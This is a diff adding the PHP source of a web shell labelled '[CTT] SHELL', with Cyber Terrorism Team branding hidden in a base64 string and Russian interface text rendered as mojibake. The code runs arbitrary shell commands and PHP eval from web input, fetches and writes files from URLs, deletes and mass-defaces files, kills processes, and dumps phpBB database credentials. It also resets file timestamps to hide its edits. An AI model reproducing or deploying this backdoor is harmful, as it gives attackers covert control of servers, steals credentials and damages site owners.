+  if (!isset($owner[0])) {$owner[0] = 0;}
+  if (!isset($owner[1])) {$owner[1] = 0; }
+  if (!isset($owner[2])) {$owner[2] = 0;}
+  if (!isset($group[0])) {$group[0] = 0;}
+  if (!isset($group[1])) {$group[1] = 0;}
+  if (!isset($group[2])) {$group[2] = 0;}
+  if (!isset($world[0])) {$world[0] = 0;}
+  if (!isset($world[1])) {$world[1] = 0;}
+  if (!isset($world[2])) {$world[2] = 0;}
+  $sum_owner = $owner[0] + $owner[1] + $owner[2];
+  $sum_group = $group[0] + $group[1] + $group[2];
+  $sum_world = $world[0] + $world[1] + $world[2];
+  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
+  $ret = @chmod($d.$f, $sum_chmod);
+  if ($ret) {$act = "ls";}
+  else {echo "Èçìåíåíèå Àòğèáóò Ôàéëà (".$d.$f."): Îøèáêà
    ";}
+ }
+ else
+ {
+  echo "
    Èçìåíåíèå Àòğèáóò Ôàéëà
    ";
+  $perms = view_perms(fileperms($d.$f));
+  $length = strlen($perms);
+  $owner_r = $owner_w = $owner_x =
+  $group_r = $group_w = $group_x = 
+  $world_r = $world_w = $group_x = "";
+
+  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
+  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
+  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
+  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
+ if ($perms[9] == "x") {$world_x = " checked";}
+  echo "
    
+
+
+
    
+
+
    Owner

    
+Read
    Write
    
+Execute    		Group

    
+Read
    
+Write
    
+Execute    		World

    Read
    
+Write
    
+Execute
    ";
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+else {$destin = $userfilename;}
+if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Îøèáêà, çàãğóæàşùàÿ ôàéë ".$uploadfile[name]." (íå ìîæåò ñêîïèğîâàòü \"".$uploadfile[tmp_name]."\" íà \"".$uploadpath.$destin."\"!
    ";}
+  }
+  elseif (!empty($uploadurl))
+  {
+if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+else
+{
+ $destin = explode("/",$destin);
+ $destin = $destin[count($destin)-1];
+ if (empty($destin))
+ {
+  $i = 0;
+  $b = "";
+  while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+}
+if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";}
+else
+{
+ $st = getmicrotime();
+ $content = @file_get_contents($uploadurl);
+ $dt = round(getmicrotime()-$st,4);
+ if (!$content) {$uploadmess .=  "Íå ìîæåò çàãğóçèòü ôàéë!
    ";}
+ else
+ {
+  if ($filestealth) {$stat = stat($uploadpath.$destin);}
+  $fp = fopen($uploadpath.$destin,"w");
+  if (!$fp) {$uploadmess .= "Îøèáêà, ïèøóùàÿ ôàéëó ".htmlspecialchars($destin)."!
    ";}
+  else
+  {
+fwrite($fp,$content,strlen($content));
+fclose($fp);
+if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+  }
+ }
+}
+  }
+ }
+ if ($miniform)
+ {
+  echo "".$uploadmess."";
+  $act = "ls";
+ }
+ else
+ {
+  echo "Çàãğóçêà Ôàéëà:
    ".$uploadmess."
    
+Ëîêàëüíûé ôàéë: 

                   èëè
    
+Çàãğóçèòü èç URL: 


    
+Ñîõğàíèòü ıòîò ôàéëü â ïàïêó: 


    
+Èìÿ Ôàéëà: 
    
+ Êîíâåğòèğîâàòü èìÿ ôàéëà

    
+
+
    ";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($v)."
    ";}
+  if (!empty($delerr)) {echo "Óäàëåíèå ñ îøèáêàìè:
    ".$delerr;}
+ }
+ $act = "ls";
+}
+if ($act == "onedelete")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."
    ";}
+  if (!empty($delerr)) {echo "Óäàëåíèå ñ îøèáêàìè:
    ".$delerr;}
+ $act = "ls";
+}
+if ($act == "onedeleted")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($d+'/'+$f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."
    ";}
+  if (!empty($delerr)) {echo "Óäàëåíèå ñ îøèáêàìè:
    ".$delerr;}
+ $act = "ls";
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $data = $deface_html;
+  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
+  $data = str_replace("%%%filename%%%",basename($v),$data);
+  $data = str_replace("%%%filepath%%%",$v,$data);
+  $fp = @fopen($v,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."
    ";}
+  if (!empty($delerr)) {echo "Defacing with errors:
    ".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.
    ";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèğîâàòü ".$v." to ".$to."!
    ";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåğåìåñòèòüñÿ ".$v." to ".$to."!
    ";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "Ïğèêëåèâàíèå ñ îøèáêàìè:
    ".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+$cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+$v = str_replace("\\","/",$v);
+if (is_dir($v))
+{
+ if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+ $v .= "*";
+}
+$cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Íå ìîæåò íàçâàòü archivator!
    ";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+if (in_array($v,$ret)) {fs_rmobj($v);}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèğîâàòü ".$v." to ".$to."!
    ";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåğåìåñòèòüñÿ ".$v." to ".$to."!
    ";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "Ïğèêëåèâàíèå ñ îøèáêàìè:
    ".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+while ($o = readdir($h)) {$list[] = $d.$o;}
+closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "
    Íå ìîæåò îòêğûòü ñïğàâî÷íèê (".htmlspecialchars($d).")!
    ";}
+ else
+ {
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; 
+  if ($vd == "f")
+  {
+$row = array();
+$row[] = "
    Èìÿ";
+$row[] = "
    Ğàçìåğ
    ";
+$row[] = "
    Èçìåíåí
    ";
+if (!$win)
+  {$row[] = "
    Âëàäåëåö/Ãğóïïà
    ";}
+$row[] = "
    Ïğàâà
    ";
+$row[] = "
    Ôóíêöèè
    ";
+
+$k = $sort[0];
+if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+if (empty($sort[1])) {$sort[1] = "d";}
+if ($sort[1] != "a")
+{
+ $y = "
    ";
+}
+else
+{
+ $y = "";
+}
+
+$row[$k] .= $y;
+for($i=0;$i".$row[$i]."";}
+}
+
+$tab = array();
+$tab[cols] = array($row);
+$tab[head] = array();
+$tab[dirs] = array();
+$tab[links] = array();
+$tab[files] = array();
+
+foreach ($list as $v)
+{
+ $o = basename($v);
+ $dir = dirname($v);
+  
+ if ($disp_fullpath) {$disppath = $v;}
+ else {$disppath = $o;}
+ $disppath = str2mini($disppath,60);
+  
+ if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";}
+ elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";}
+
+ $uo = urlencode($o);
+ $ud = urlencode($dir);
+ $uv = urlencode($v);
+
+ $row = array();
+
+if (is_dir($v))
+ {
+  if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+  else {$type = "DIR";}
+  $row[] =  "   ".$disppath."";
+  $row[] = $type;
+ }
+ elseif(is_file($v))
+ {
+  $ext = explode(".",$o);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $row[] =  "  ".$disppath."";
+  $row[] = view_size(filesize($v));
+ }
+ $row[] = "
    ".date("d.m.Y H:i:s",filemtime($v))."
    ";
+  
+ if (!$win)
+ {
+  $ow = @posix_getpwuid(fileowner($v));
+  $gr = @posix_getgrgid(filegroup($v));
+  $row[] = "
    ".$ow["name"]."/".$gr["name"]."
    ";
+ }
+
+ if (is_writable($v)) {$row[] = "".view_perms(fileperms($v))."";}
+ else {$row[] = "".view_perms(fileperms($v))."";}
+
+ if (is_dir($v)) {$row[] = "  ";}
+ else {$row[] = "    ";}
+
+ if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+ elseif (is_link($v)) {$tab[links][] = $row;}
+ elseif (is_dir($v)) {$tab[dirs][] = $row;}
+ elseif (is_file($v)) {$tab[files][] = $row;}
+}
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+global $v;
+return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+$tab[dirs] = array_reverse($tab[dirs]);
+$tab[files] = array_reverse($tab[files]);
+  }
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "
+";
+$smsn=0;
+  foreach($table as $row)
+  {
+$smsn++;
+ if ($smsn!=2 && $smsn!=3) { 
+echo "\r\n";
+foreach($row as $v) {echo "\r\n";}
+echo "\r\n";
+}
+
+  }
+  echo "
    ".$v."
    
+
+
+
    
+Ïàïêè: ".(count($tab[dirs])+count($tab[links]))." Ôàéëû: ".count($tab[files])."";
+if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+echo "                   ";
+  }
+  echo " ";
+  echo "";
+
+echo "
    ";
+echo "

    [CTT] SHELL ver ".$shver."
    ";
+ }
+
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "Ğåçóëüòàò âûïîëíåíèÿ ıòà êîìàíäà:
    ";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+myshellexec($cmd);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($cmd_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "
    ";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($cmd_txt)
+{
+ echo "
    ";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "Êîìàíäà âûïîëíåíèÿ:";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "


    ";
+}
+if ($act == "ps_aux")
+{
+ echo "Ïğîöåññû:
    ";
+ if ($win) {
+echo "
    ";
+system('tasklist');
+echo "
    ";
+}
+ else
+ {
+  if ($pid)
+  {
+if (!$sig) {$sig = 9;}
+echo "Sending signal ".$sig." to #".$pid."... ";
+$ret = posix_kill($pid,$sig);
+if ($ret) {echo "ok. he is dead, amen.";}
+else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+$ret = htmlspecialchars($ret);
+$ret = str_replace(""," ",$ret);
+while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+$prcs = explode("\n",$ret);
+$head = explode(" ",$prcs[0]);
+$head[] = "ACTION";
+unset($prcs[0]);
+echo "";
+echo "";
+foreach ($head as $v) {echo "";}
+echo "";
+foreach ($prcs as $line)
+{
+ if (!empty($line))
+ {
+  echo "";
+  $line = explode(" ",$line);
+  $line[10] = join(" ",array_slice($line,10,count($line)));
+  $line = array_slice($line,0,11);
+  $line[] = "KILL";
+  foreach ($line as $v) {echo "";}
+  echo "";
+ }
+}
+echo "
       ".$v."   
       ".$v."   
    ";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "Ğåçóëüòàò âûïîëíåíèÿ ıòîò PHP-êîä:
    ";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+eval($eval);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($eval_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "
    ";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($eval_txt)
+{
+ echo "
    ";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "PHP-êîä âûïîëíåíèÿ"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "


    ";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";}
+  else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+
+  echo "Ğàññìîòğåíèå ôàéëà:     ".$f." (".view_size(filesize($d.$f)).")      ";
+  if (is_writable($d.$f)) {echo "Ïîëíûé äîñòóï ÷òåíèÿ/çàïèñè (".view_perms(fileperms($d.$f)).")";}
+  else {echo "Read-Only (".view_perms(fileperms($d.$f)).")";}
+ 
+  echo "
    ";
+  if ($ft == "info")
+  {
+echo "Information:";
+echo "";
+echo "";
+echo "";
+if (!$win)
+{
+ echo "";
+echo "";
+echo "";
+echo "";
+echo "
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group ";
+ $tmp=posix_getpwuid(fileowner($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+ else echo $tmp['name']." ";
+ $tmp=posix_getgrgid(filegroup($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+ else echo $tmp['name'];
+}
+echo "
    Perms";
+
+if (is_writable($d.$f))
+{
+ echo "".view_perms(fileperms($d.$f))."";
+}
+else
+{
+ echo "".view_perms(fileperms($d.$f))."";
+}
+
+echo "
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    ";
+
+
+$fi = fopen($d.$f,"rb");
+if ($fi)
+{
+ if ($fullhexdump)
+ {
+  echo "FULL HEXDUMP";
+  $str=fread($fi,filesize($d.$f));
+ }
+ else
+ {
+  echo "HEXDUMP PREVIEW";
+  $str=fread($fi,$hexdump_lines*$hexdump_rows);
+ }
+ $n=0;
+ $a0="00000000
    ";
+ $a1="";
+ $a2="";
+ for ($i=0; $i";}
+$a1.="
    ";
+$a2.="
    ";
+  }
+ }
+ echo "
     $a0".
+"$a1$a2

    ";
+}
+$encoded = "";
+if ($base64 == 1)
+{
+ echo "Base64 Encode
    ";
+ $encoded = base64_encode($r);
+}
+elseif($base64 == 2)
+{
+ echo "Base64 Encode + Chunk
    ";
+ $encoded = chunk_split(base64_encode($r));
+}
+elseif($base64 == 3)
+{
+ echo "Base64 Encode + Chunk + Quotes
    ";
+ $encoded = base64_encode($r);
+ $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+}
+elseif($base64 == 4)
+{
+}
+if (!empty($encoded))
+{
+ echo "

    ";
+}
+echo "HEXDUMP: [Full] [Preview]
    Base64: 
+    [Encode
+[+chunk
+[+chunk+quotes
+[Decode
+
    ";
+  }
+  elseif ($ft == "html")
+  {
+if ($white) {@ob_clean();}
+echo $r;
+if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+echo "
    ".htmlspecialchars($r)."
    ";
+  }
+  elseif ($ft == "ini")
+  {
+echo "
    ";
+var_dump(parse_ini_file($d.$f,true));
+echo "
    ";
+  }
+  elseif ($ft == "phpsess")
+  {
+echo "
    ";
+$v = explode("|",$r);
+echo $v[0]."
    ";
+var_dump(unserialize($v[1]));
+echo "
    ";
+  }
+  elseif ($ft == "exe")
+  {
+echo "
     
    ";
+  }
+  elseif ($ft == "sdb")
+  {
+echo "
    ";
+var_dump(unserialize(base64_decode($r)));
+echo "
    ";
+  }
+  elseif ($ft == "code")
+  {
+if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+{
+ $arr = explode("
+",$r);
+ if (count($arr == 18))
+ {
+  include($d.$f);
+  echo "phpBB configuration is detected in this file!
    ";
+  if ($dbms == "mysql4") {$dbms = "mysql";}
+  if ($dbms == "mysql") {echo "Connect to DB

    ";}
+  else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";}
+  echo "Parameters for manual connect:
    ";
+  $cfgvars = array(
+  "dbms"=>$dbms,
+  "dbhost"=>$dbhost,
+  "dbname"=>$dbname,
+  "dbuser"=>$dbuser,
+  "dbpasswd"=>$dbpasswd 
+  );
+  foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";}
+ 
+  echo "    ";
+  echo "
    ";
+ }
+}
+echo "
    ";
+if (!empty($white)) {@ob_clean();}
+if ($rehtml) {$r = rehtmlspecialchars($r);} 
+$r = stripslashes($r); 
+$strip = false;
+if(!strpos($r,""; $r = trim($r); $strip = true;}
+$r = @highlight_string($r, TRUE); 
+if ($delspace) {$buffer = str_replace (" ", " ", $r);}
+echo $r;
+if (!empty($white)) {exit;}
+echo "
    ";
+  }
+  elseif ($ft == "download")
+  {
+@ob_clean();
+header("Content-type: ctshell");
+header("Content-disposition: attachment; filename=\"".$f."\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "notepad")
+  {
+@ob_clean();
+header("Content-type: text/plain"); 
+header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "img")
+  {
+if (!$white)
+{
+ echo "
    ";
+}
+else
+{
+ @ob_clean();
+ $ext = explode($f,".");
+ $ext = $ext[count($ext)-1];
+ header("Content-type: image/gif"); 
+ echo($r); 
+ exit;
+}
+  }
+  elseif ($ft == "edit")
+  {
+if (!empty($submit))
+{
+ if ($filestealth) {$stat = stat($d.$f);}
+ if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
+ $fp = fopen($d.$f,"w");
+ if (!$fp) {echo "Can't write to file!";}
+ else
+ {
+  echo "Ñîõğàí¸íü!!!";
+  fwrite($fp,$nfcontent);
+  fclose($fp);
+  if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+  $r = $nfcontent;
+ }
+}
+$rows = count(explode("
+",$r));
+if ($rows < 10) {$rows = 10;}
+if ($rows > 30) {$rows = 30;}
+echo "
      
    ";
+  }
+  elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";}
+  else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}
+$data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4=");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe".
+"Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9".
+"W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
